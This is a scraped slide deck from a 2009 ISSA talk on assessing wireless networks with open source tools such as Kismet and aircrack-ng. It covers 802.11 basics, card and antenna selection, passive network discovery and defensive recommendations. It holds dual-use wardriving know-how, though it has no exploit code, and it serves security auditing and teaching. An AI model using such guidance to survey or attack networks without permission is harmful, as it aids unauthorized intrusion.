Assessing Wireless Security Using Open Source Tools


Published on

  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • Before the wi-fi alliance there was no guarantee two 802.11 devices would work together or would have all the features work together. This was seem with early implementations of WEP. Different vendors often interpret standards differently
  • Official way clients find wireless networks. Documented in the standard. Later we will discuss other ways you can find networks.
  • Official way clients find wireless networks. Documented in the standard. Later we will discuss other ways you can find networks.
  • Be sure to check the MD5 hash, it’s a big file that can easily get munged in transport
  • Omni directions really makes a donut shape but it increased reception in all directions we care about.
  • Can buy cantenas 30dba parabolic dish is around $400 and weights 35 pounds and is about 5 feet across Panels get less questions from TSA than a yagi or parabolic dish
  • I love it when folks buy a $100 antenna but spend $5 on the cables Some antennas do use SMA. So be sure to check before buying the pigtail
  • The way Windows, Linux and OSX natively find open access points
  • Limit power Can be gotten around with directional antennas RF shielding Expensive 802.11a Not sure if this will keep up as more and more systems come with A cards
  • WPA uses TKIP (RC4-based algorithm) WPA2 uses CCMP (AES-based algorithm)
  • Assessing Wireless Security Using Open Source Tools

    1. 1. Assessing Wireless Security Using Open Source Tools By: Matthew Neely Presented: May 5 th 2009 at Pittsburgh ISSA
    2. 2. Speaker Biography <ul><li>Matt Neely CISSP, CTGA, GCIH, GCWN - Manager of the Profiling team at SecureState: </li></ul><ul><ul><li>Areas of expertise include: wireless security, penetration testing, physical security, security convergence and incident response </li></ul></ul><ul><ul><li>Formed and ran the TSCM team at a Fortune 200 company </li></ul></ul><ul><ul><li>10 years of security experience </li></ul></ul><ul><li>Outside of work: </li></ul><ul><ul><li>Co-host of the Security Justice Podcast </li></ul></ul><ul><ul><li>Board member for the North Eastern Ohio Information Security Forum </li></ul></ul><ul><ul><li>Licensed ham radio operator (Technician) for almost 20 years </li></ul></ul>
    3. 3. <ul><li>What concerns do you have about wireless? </li></ul>
    4. 4. Agenda <ul><li>Overview of the 802.11 standard </li></ul><ul><li>Hardware - Requirements and recommendations </li></ul><ul><li>Discovering wireless networks </li></ul><ul><li>Introduction to Kismet </li></ul><ul><li>Lab – Discovering and enumerating wireless network using Kismet </li></ul><ul><li>Demo – Aircrack-ng </li></ul><ul><li>How to tell if an AP is on your network </li></ul><ul><li>Wireless security recommendations </li></ul><ul><li>Conclusion </li></ul>
    5. 5. OVERVIEW OF 802.11
    6. 6. What is 802.11 <ul><li>Set of wireless local area network (WLAN) standards developed by the IEEE </li></ul><ul><li>Uses the standard Ethernet protocol </li></ul><ul><li>Adds special media access control process </li></ul>
    7. 7. Popular 802.11 Standards <ul><li>802.11 </li></ul><ul><ul><li>2.4 GHz </li></ul></ul><ul><ul><li>2 Mbps (0.9 Mbps typical) </li></ul></ul><ul><li>802.11a </li></ul><ul><ul><li>5 GHz </li></ul></ul><ul><ul><li>54 Mbps (23 Mbps typical) </li></ul></ul><ul><li>802.11b </li></ul><ul><ul><li>2.4 GHz </li></ul></ul><ul><ul><li>11 Mbps (4.5 Mbps typical) </li></ul></ul><ul><li>802.11g </li></ul><ul><ul><li>2.4 GHz </li></ul></ul><ul><ul><li>54 Mbps (23 Mbps typical) </li></ul></ul><ul><li>802.11n - Draft </li></ul><ul><ul><li>2.4 and 5 GHz </li></ul></ul><ul><ul><li>300 Mbps (74 Mbps typical) </li></ul></ul><ul><ul><li>Greenfield mode </li></ul></ul>
    8. 8. 802.11 Versus Wi-Fi <ul><li>802.11 is a set of standards from the IEEE </li></ul><ul><li>Wi-Fi is a subset of the 802.11 standards managed by the Wi-Fi Alliance </li></ul><ul><li>Wi-Fi Alliance insures all products with the Wi-Fi logo will work together </li></ul><ul><li>Different vendors often interpret standards differently </li></ul><ul><li>Wi-Fi Alliance defines what is the “right” thing to do when implementing a standard </li></ul><ul><ul><li>Especially useful when vendors implement draft standards </li></ul></ul><ul><ul><ul><li>Wi-Fi Protected Access (WPA) </li></ul></ul></ul><ul><ul><ul><li>“ Draft” 802.11n equipment. </li></ul></ul></ul>
    9. 9. Infrastructure Vs. Ad-hoc Networks <ul><li>Infrastructure: Allows one or more computers to connect to a network using an Access Point (AP). </li></ul><ul><ul><li>AP is the hub of communication </li></ul></ul><ul><ul><li>Service Set IDentifier (SSID) is used to identify the network </li></ul></ul><ul><li>Ad-Hoc: Allows user to create peer-to-peer networks. </li></ul><ul><ul><li>Does not use an AP </li></ul></ul><ul><ul><li>Independent Basic Service Set (IBSS) is used to identify the network </li></ul></ul><ul><ul><li>First active ad-hoc station establishes the network and starts sending beacons with the IBSS </li></ul></ul>
    11. 11. Broadcast Probe Request <ul><li>Client sends out broadcast probe request packets asking who is there </li></ul>
    12. 12. Broadcast Probe Reply <ul><li>Any APs in the area reply back with their SSID </li></ul>
    13. 13. Direct Probe Request <ul><li>Client can also send direct probe request packets looking for a specific network name </li></ul><ul><ul><li>Example: I’m looking for network Linksys </li></ul></ul>
    14. 14. Beacon Packets <ul><li>AP sends out beacon packets </li></ul><ul><ul><li>Beacon packets contain the SSID of the network </li></ul></ul><ul><li>Client listens for beacon packets and uses the SSID information in the packet to figure out what networks are in range </li></ul>
    15. 15. Hidden APs <ul><li>Beaconless APs </li></ul><ul><ul><li>AKA “disabled broadcast SSID”, “cloaked” or “closed” </li></ul></ul><ul><li>Some APs do not send beacon packets when clients are not connected </li></ul><ul><li>Other APs still send a beacon packet but leave the SSID field blank </li></ul><ul><li>Attempts to prevent malicious users from finding the AP </li></ul>
    16. 16. HARDWARE <ul><li>Requirement and Recommendations </li></ul>
    17. 17. Hardware <ul><li>Required </li></ul><ul><ul><li>Computer - Running or capable of running Linux </li></ul></ul><ul><ul><ul><li>Install Linux on a laptop </li></ul></ul></ul><ul><ul><ul><li>Use a LiveLinux distro such as BackTrack </li></ul></ul></ul><ul><ul><li>Wireless card </li></ul></ul><ul><li>Optional </li></ul><ul><ul><li>External Antenna </li></ul></ul><ul><ul><li>Pigtail </li></ul></ul><ul><ul><li>GPS </li></ul></ul>
    18. 18. BackTrack <ul><li>LiveLinux distro containing a large number of pre-configured attack tools </li></ul><ul><li>Variety of wireless drivers come pre-loaded </li></ul><ul><li>Plug and play support for many wireless cards </li></ul><ul><li>Available in two formats: </li></ul><ul><ul><li>Bootable CD </li></ul></ul><ul><ul><li>Bootable thumb drive </li></ul></ul><ul><ul><ul><li>Contains more tools </li></ul></ul></ul><ul><ul><ul><li>Data written to the thumb drive persists across reboots </li></ul></ul></ul><ul><li>Download: </li></ul><ul><ul><li> </li></ul></ul>
    19. 19. Backtrack in VMWare <ul><li>BackTrack can not directly access a PCMCIA or mini-pci card </li></ul><ul><ul><li>Limits what fun stuff can be done </li></ul></ul><ul><li>Can use a USB dongle with a supported chipset </li></ul><ul><ul><li>Temperamental and unstable at times </li></ul></ul><ul><li>For just about everything except wireless related tasks, I run BackTrack inside VMWare </li></ul><ul><li>When I need to run wireless tools in BackTrack I prefer to run BackTrack on the bare hardware </li></ul>
    20. 20. Saving Data on BackTrack <ul><li>When run from a CD all saved data will be erased on reboot </li></ul><ul><li>Solution 1: </li></ul><ul><ul><li>Run BackTrack from a bootable thumb drive </li></ul></ul><ul><li>Solution 2: </li></ul><ul><ul><li>Mount a thumb drive and save your data </li></ul></ul><ul><ul><li>Command: mount /dev/sdb1 </li></ul></ul><ul><li>Solution 3: </li></ul><ul><ul><li>Save your data to a network share before rebooting </li></ul></ul>
    21. 21. Wireless Card <ul><li>Hopefully your internal wireless card works </li></ul><ul><ul><li>Centrino or Atheros cards generally work well </li></ul></ul><ul><ul><li>Broadcom cards are a problem </li></ul></ul><ul><li>Can use an external wireless card if the internal card does not work </li></ul>
    22. 22. Determining What Wireless Type <ul><li>Look up the specs for your laptop </li></ul><ul><li>Query the USB or PCI bus inside of Linux </li></ul><ul><ul><li>lspci – Linux command that lists the devices attached to the PCI bus </li></ul></ul><ul><ul><ul><li>Useful for gathering information on internal wireless cards </li></ul></ul></ul><ul><ul><li>lsusb – Linux command that list devices attached to the USB bus </li></ul></ul>
    23. 23. Example lspci Output
    24. 24. Example lsusb Output
    25. 25. Card Selection <ul><li>Features to look for in an external card: </li></ul><ul><ul><li>1) Atheros or Ralink RT73 chipset </li></ul></ul><ul><ul><ul><li>Must support RF monitor mode </li></ul></ul></ul><ul><ul><ul><li>LORCON support is recommended </li></ul></ul></ul><ul><ul><li>2) External antenna connector </li></ul></ul><ul><ul><li>3) Form factor that matches your needs </li></ul></ul><ul><ul><ul><li>PCMCIA/Express cards </li></ul></ul></ul><ul><ul><ul><li>USB </li></ul></ul></ul>
    26. 26. Getting the Card You Want <ul><li>Difficult to know what chipset a card uses </li></ul><ul><ul><li>Manufactures change them all the time </li></ul></ul><ul><li>Pay close attention to model number and version </li></ul><ul><li>Buy your card from a store with a hassle free return policy </li></ul><ul><li>Buy your card from a store that states the chipset </li></ul><ul><ul><li>Look for stores that cater to Linux users, wardrivers and wireless hackers </li></ul></ul><ul><ul><li> </li></ul></ul>
    27. 27. Card Chipset Information <ul><li>Card Chipset Lists </li></ul><ul><ul><li> </li></ul></ul><ul><ul><li> </li></ul></ul><ul><ul><li> – Avoid </li></ul></ul><ul><ul><li> </li></ul></ul><ul><li>Backtrack website: </li></ul><ul><ul><li> </li></ul></ul><ul><li>Aircrack-ng webiste: </li></ul><ul><ul><li> </li></ul></ul>
    28. 28. External Antennas <ul><li>Greatly increases performance </li></ul><ul><li>Useful when: </li></ul><ul><ul><li>Performing audits from inside a vehicle </li></ul></ul><ul><ul><li>Triangulating the location of an AP </li></ul></ul><ul><ul><li>Measuring RF leakage from a building </li></ul></ul><ul><li>Antennas are tuned to work on specific frequencies </li></ul><ul><li>Need to select antennas that are tuned to the frequency range being used </li></ul><ul><ul><li>2.4 GHz is the most common </li></ul></ul><ul><ul><ul><li>Used by b, g and n networks </li></ul></ul></ul><ul><ul><ul><li>Same frequency used by Bluetooth </li></ul></ul></ul><ul><ul><li>5 GHz is needed for a and n networks </li></ul></ul>
    29. 29. Types of Antennas <ul><li>Omni-directional </li></ul><ul><ul><li>Increases reception in all directions </li></ul></ul><ul><ul><li>Magnetic mount omni-directional antennas are useful for mounting on cars </li></ul></ul><ul><li>Directional </li></ul><ul><ul><li>Focuses the signal like a spot light </li></ul></ul><ul><ul><li>Can be used to triangulate the location of a signal </li></ul></ul>
    30. 30. Types of Directional Antennas <ul><li>Panel </li></ul><ul><ul><li>$20-40 </li></ul></ul><ul><ul><li>Typical gain 8-18 dBi </li></ul></ul><ul><ul><li>Good for travel: compact, portable and hard to damage </li></ul></ul><ul><li>Yagi </li></ul><ul><ul><li>$30-50 </li></ul></ul><ul><ul><li>Typically gain 9-15 dBi </li></ul></ul><ul><ul><li>Can be large </li></ul></ul><ul><ul><li>Typically encased in pcv pipe to protect the antenna </li></ul></ul><ul><li>Parabolic dish </li></ul><ul><ul><li>$30 and up </li></ul></ul><ul><ul><li>Very large </li></ul></ul><ul><ul><li>Very high gain, 19-30 dBi </li></ul></ul><ul><ul><li>Hard to transport </li></ul></ul><ul><li>Waveguide (cantennas) </li></ul><ul><ul><li>Around $50 </li></ul></ul><ul><ul><li>Typical gain 12 dBi </li></ul></ul>
    31. 31. Antenna Recommendation <ul><li>Get two antennas </li></ul><ul><li>Directional </li></ul><ul><ul><li>Either a panel or small yagi </li></ul></ul><ul><li>Omni-direction </li></ul><ul><ul><li>Magnetic mount is very helpful if you spend time doing surveys outside a building </li></ul></ul><ul><li>Good source: </li></ul>
    32. 32. Pigtails and Adapters <ul><li>Pigtail – Converts the small connector on the card to the connector used on the antenna </li></ul><ul><li>Do not buy cheap cables! </li></ul><ul><ul><li>Where most signal loss occurs </li></ul></ul><ul><ul><li>Good quality pigtails cost around $10-20 </li></ul></ul><ul><ul><li>Only use cabled designed for use in the 2.4 or 5 GHz range </li></ul></ul><ul><li>Pigtails should probably end in a N-Type male jack </li></ul><ul><ul><li>Most antennas have a N-Type female jack </li></ul></ul><ul><li>Good source: </li></ul><ul><li>Pictures of common Wi-Fi antenna connectors: </li></ul><ul><ul><li> </li></ul></ul>
    33. 33. GPS <ul><li>Allows data to be placed onto a map for analysis </li></ul><ul><li>Only get an NMEA compatible GPS </li></ul><ul><li>Interface type: </li></ul><ul><ul><li>Serial: Does not require a driver and just about always works </li></ul></ul><ul><ul><li>USB: Requires drivers which can be tricky in Linux </li></ul></ul><ul><ul><li>Bluetooth: Avoid because it operates in the 2.4 GHz spectrum </li></ul></ul><ul><li>If you run Linux and do not have a serial port, the safest option is a serial GPS and a USB-to-serial adaptor </li></ul><ul><ul><li>Buy a USB adaptor that is Linux friendly </li></ul></ul>
    35. 35. Active Network Discovery <ul><li>Official way to find networks </li></ul><ul><li>Client sends out a broadcast probe request looking for networks </li></ul><ul><li>Client listens for beacon packets from APs </li></ul><ul><li>Cons: </li></ul><ul><ul><li>Requires the client to be within transmission range of the AP </li></ul></ul><ul><ul><li>Cannot find beaconless/hidden network </li></ul></ul><ul><li>Pros: </li></ul><ul><ul><li>Every wireless card supports this method </li></ul></ul><ul><ul><li>Does not require a card or driver that supports RF monitor mode </li></ul></ul><ul><li>Windows tools such as NetStumbler use active network discovery </li></ul>
    36. 36. Passive Network Discovery <ul><li>Card listens to the airwaves and extracts information about the networks in the area from the packets it sees </li></ul><ul><li>Requires cards that support RF monitor mode </li></ul><ul><ul><li>Not all cards and drivers support RF monitor mode </li></ul></ul><ul><li>Pros: </li></ul><ul><ul><li>Client only needs to be within receiving range </li></ul></ul><ul><ul><li>Can detect networks with the beacon turned off </li></ul></ul><ul><ul><li>Can gain more information about the network </li></ul></ul><ul><li>Cons: </li></ul><ul><ul><li>Requires a card and driver that supports full RF monitor mode </li></ul></ul><ul><ul><li>No free Windows program supports passive network discovery </li></ul></ul>
    37. 37. Kismet <ul><li> </li></ul><ul><li>Passive scanner </li></ul><ul><li>OS: Linux and other Unix systems </li></ul><ul><li>Kismet is really two programs </li></ul><ul><ul><li>kismet_server: Collects the packets </li></ul></ul><ul><ul><li>kismet_client: User interface </li></ul></ul><ul><li>Pros: </li></ul><ul><ul><li>Will find hidden networks </li></ul></ul><ul><ul><li>GPS support </li></ul></ul><ul><li>Cons: </li></ul><ul><ul><li>Complicated installation and configuration </li></ul></ul>
    38. 38. Kismet Classic Versus Newcore <ul><li>“ Classic” is the present stable release of Kismet </li></ul><ul><li>Kismet-newcore is a rewrite of Kismet </li></ul><ul><ul><li>Still under development </li></ul></ul><ul><ul><li>Supports plugins </li></ul></ul><ul><ul><ul><li>Example: DECT support </li></ul></ul></ul><ul><li>Avoid newcore unless you have a specific reason to use it or like to tinker </li></ul>
    39. 39. Configuring Kismet <ul><li>Configuration file is usually located at /usr/local/etc/kismet.conf </li></ul><ul><li>Specify suiduser </li></ul><ul><ul><li>suiduser=<normal non-root user> </li></ul></ul><ul><ul><li>Ex: suiduser=matt </li></ul></ul><ul><li>Packet Source </li></ul><ul><ul><li>source=<driver, interface, name> </li></ul></ul><ul><ul><li>Ex: source=madwifi_g,ath0,AtherosCard </li></ul></ul><ul><li>Skip these steps on BackTrack </li></ul><ul><ul><li>Use –c flag when starting the server to tell it the packet source </li></ul></ul><ul><ul><li>Ex: kismet_server –c madwifi_g,wifi0,CiscoCard </li></ul></ul>
    40. 40. Source Settings - Driver <ul><li>Run airmon-ng to determine which driver your wireless card is using </li></ul><ul><ul><li>Part of the Aircrack-ng suite </li></ul></ul><ul><ul><li># airmon-ng </li></ul></ul><ul><ul><li>$ sudo airmon-ng </li></ul></ul>
    41. 41. Driver Setting - Source <ul><li>Run airmon-ng or iwconfig to see all the wireless interfaces </li></ul><ul><ul><li># iwconfig </li></ul></ul><ul><ul><li>$ iwconfig </li></ul></ul>
    43. 43. Accessing the Lab Server <ul><li>Connect to wireless network </li></ul><ul><ul><li>Lab-Connect_Here </li></ul></ul><ul><li>Windows Telnet: </li></ul><ul><ul><li>Start -> Run -> cmd.exe </li></ul></ul><ul><ul><li>telnet –t vt100 </li></ul></ul><ul><li>SSH (Putty or other SSH client) </li></ul><ul><ul><li>Connect to </li></ul></ul><ul><li>Once connected login </li></ul><ul><ul><li>Username: kismet </li></ul></ul><ul><ul><li>Password: kismet </li></ul></ul>
    44. 44. DEMO: AIRODUMP-NG
    45. 45. How to Tell if an AP is on Your Network <ul><li>Direction/Location </li></ul><ul><ul><li>GPS </li></ul></ul><ul><ul><li>Use a directional antenna </li></ul></ul><ul><li>Connect to the network and check: </li></ul><ul><ul><li>If a traceroute shows the traffic traversing your network </li></ul></ul><ul><ul><li>If you can contact an internal server </li></ul></ul><ul><ul><li>DNS server address </li></ul></ul><ul><li>Do not rely on the assigned IP address </li></ul>
    47. 47. General Security Recommendations <ul><li>Make the network difficult to find </li></ul><ul><ul><li>Limit AP power output </li></ul></ul><ul><ul><li>Use RF shielding to prevent RF leakage </li></ul></ul><ul><ul><li>Only use 802.11a APs </li></ul></ul><ul><li>Do not use hidden APs </li></ul><ul><ul><li>Could make it easier to attack your wireless Windows clients </li></ul></ul><ul><ul><ul><li>Windows prefers visible networks over hidden networks </li></ul></ul></ul><ul><ul><ul><li>Attackers can trick users into connecting to a malicious AP </li></ul></ul></ul><ul><li>MAC filtering </li></ul><ul><ul><li>Not recommended </li></ul></ul><ul><ul><li>Easy to by-pass and adds a lot of complexity in a large environment </li></ul></ul><ul><ul><li>Minimal level of protection is generally not worth the effort </li></ul></ul>
    48. 48. Wireless IDS <ul><li>Consider deploying a wireless IDS </li></ul><ul><li>Can detect: </li></ul><ul><ul><li>De-auth attacks </li></ul></ul><ul><ul><li>RTS and CTS attacks denial of service attacks </li></ul></ul><ul><ul><li>Rogue APs </li></ul></ul><ul><ul><ul><li>Both on and off your network </li></ul></ul></ul><ul><li>Remember IDS is only detection and not prevention </li></ul><ul><li>Be very careful with wireless IPS </li></ul><ul><ul><li>IPS system could end up attacking neighboring networks </li></ul></ul>
    49. 49. Wireless Encryption and Authentication <ul><li>Do not use WEP </li></ul><ul><li>Migrate from LEAP </li></ul><ul><ul><li>Known weaknesses and attack tools for LEAP </li></ul></ul><ul><ul><li>If you can not migrate from LEAP be sure you enforce a strong password policy </li></ul></ul><ul><li>Use WPA or WPA2 </li></ul><ul><ul><li>Prefer WPA2 </li></ul></ul><ul><ul><li>Both can be secured fairly well </li></ul></ul>
    50. 50. WPA-PSK Recommendations <ul><li>WPA-PSK (Pre-Shared Key) </li></ul><ul><li>AKA WPA Home </li></ul><ul><li>Choose a long and complex passphrase </li></ul><ul><ul><li>Prevents bruteforce attacks from tools like Cowpatty </li></ul></ul><ul><li>Choose a unique SSID </li></ul><ul><ul><li>Prevents using pre-compiled tables to speed up bruteforce attacks </li></ul></ul>
    51. 51. WPA Enterprise Recommendations <ul><li>Generally more secure than WPA-PSK </li></ul><ul><ul><li>Also more complex </li></ul></ul><ul><li>Requires a RADIUS server </li></ul><ul><li>Use an authentication type that provides mutual authentication </li></ul><ul><li>With PEAP and EAP-TTLS insure the client is properly configured </li></ul><ul><li>Consider using two-factor authentication </li></ul>
    52. 52. Conclusion <ul><li>Kismet are free tools that can be used to locate wireless networks </li></ul><ul><li>Selecting the right card is critical when using Kismet </li></ul><ul><li>Finding N Greenfield mode networks could be a challenge in the future </li></ul><ul><li>Do not use WEP to secure a wireless network </li></ul><ul><li>Use WPA2 Enterprise with multi-factor authentication </li></ul><ul><li>Insure the wireless client is properly configured and secured </li></ul>
    53. 53. QUESTIONS? <ul><li>More Information: </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li>[email_address] </li></ul>